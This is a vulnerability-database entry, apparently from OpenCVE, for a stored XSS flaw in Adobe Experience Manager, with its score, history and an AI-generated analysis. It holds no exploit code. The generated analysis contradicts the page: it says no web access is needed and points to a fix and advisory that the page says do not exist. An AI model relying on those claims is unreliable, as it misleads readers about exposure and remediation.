Description
Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Published: 2026-06-09
Score: 5.4 Medium
EPSS: n/a
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier allow a low‑privileged attacker to store malicious JavaScript in optional form fields. When a user later views the page that renders the stored data, the script executes in the victim’s browser, potentially allowing data theft, session hijacking, or injection of further malicious content. The vulnerability is a classic input‑validation flaw (CWE‑79) and the CVSS score of 5.4 reflects moderate exploitation potential.

Affected Systems

The affected products are Adobe Experience Manager instances running any of the following releases: 6.5.24, the LTS SP1 branch, or any release dated 2026.04 or earlier. All deployment locations that expose these form fields to users are potentially impacted.

Risk and Exploitability

The CVSS score indicates moderate severity, and the EPSS score is not available, so no quantified exploitation probability exists. The vulnerability is not listed in CISA’s KEV catalog, suggesting it has not been widely abused yet. Because the flaw is stored, an attacker does not need direct web access; simply adding malicious content to a form that a legitimate user will later view is sufficient. The scope change indicates that the impact might affect a broader set of application components than a typical single‑page XSS.

Generated by OpenCVE AI on June 9, 2026 at 20:44 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Adobe Experience Manager to the latest release that contains the fix for CVE-2026-47981 as detailed in the Adobe advisory.
  • Implement strict input validation and output encoding for all custom form fields that accept user data, ensuring that any stored content is escaped before rendering.
  • Apply a web application firewall rule to detect and block common XSS payloads until the patch is deployed.

Generated by OpenCVE AI on June 9, 2026 at 20:44 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Wed, 10 Jun 2026 03:00:00 +0000

Type Values Removed Values Added
First Time appeared Adobe
Adobe adobe Experience Manager
Vendors & Products Adobe
Adobe adobe Experience Manager

Tue, 09 Jun 2026 21:30:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Tue, 09 Jun 2026 17:15:00 +0000

Type Values Removed Values Added
Description Adobe Experience Manager versions 6.5.24, LTS SP1, 2026.04 and earlier are affected by a stored Cross-Site Scripting (XSS) vulnerability that could be abused by a low-privileged attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim's browser when they browse to the page containing the vulnerable field. Scope is changed.
Title Adobe Experience Manager | Cross-site Scripting (Stored XSS) (CWE-79)
Weaknesses CWE-79
References
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Subscriptions

Adobe Adobe Experience Manager
cve-icon MITRE

Status: PUBLISHED

Assigner: adobe

Published:

Updated: 2026-06-09T19:45:03.457Z

Reserved: 2026-05-20T15:50:31.366Z

Link: CVE-2026-47981

cve-icon Vulnrichment

Updated: 2026-06-09T19:44:57.448Z

cve-icon NVD

Status : Undergoing Analysis

Published: 2026-06-09T17:17:40.963

Modified: 2026-06-09T19:30:24.713

Link: CVE-2026-47981

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-06-10T02:45:15Z

Weaknesses